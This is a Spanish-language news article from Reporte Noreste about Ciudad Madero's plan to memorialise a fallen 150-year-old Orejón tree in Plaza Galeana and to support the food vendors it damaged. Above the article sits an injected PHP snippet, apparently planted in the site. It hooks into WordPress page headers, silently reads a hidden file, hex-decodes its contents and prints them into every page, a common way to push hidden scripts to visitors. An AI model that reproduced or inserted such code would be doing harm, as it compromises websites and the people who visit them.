if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Inmortalizaran al árbol Orejón que cayó en Plaza Galeana – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Inmortalizaran al árbol Orejón que cayó en Plaza Galeana

Inmortalizaran al árbol Orejón que cayó en Plaza Galeana

Ciudad Madero Tamaulipas.- El árbol de la especie Orejón  con más de 150 años de vida, que colapsó en la zona de juegos de la Plaza Galeana, causando lesiones a varias personas y destruyendo varios puestos de venta de comida, no morirá en la historia de Ciudad Madero.

Adrián Oseguera Kernion, alcalde de Ciudad Madero, en supervisión de la Plaza Galeana, dio a conocer el interesante proyecto de realizar la historia del árbol Orejón, a la par de la Historia de la Plaza Galena.

Informó el alcalde que se hará un compendio para que sea disfrutado por los turistas, además de que de su madera, se construirán atractivas bancas que se instalaran en la Plaza, a la par de la reconfiguración del kiosco.

Con estas acciones, se reforzará la historia de la Plaza Galeana y el emblemático árbol Orejón, que por más de 150 años se erigió como un gigante con abundante ramaje y una extraordinaria sombra.

APOYO A LOS VENDEDORES DRE COMIDA

Oseguera Kernion, destacó que ya se está brindando a los puesteros que sufrieron daños en sus puestos de expendio de comida, todo el apoyo para que continúen con sus actividades de la venta de comida en la icónica Plaza Galeana.

Lic. En Psicología Clínica por la UNE, Diplomado en Sexualidad Humana por la UNAM, LCC – UAT. Inició carrera en medios de comunicación en 1996.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas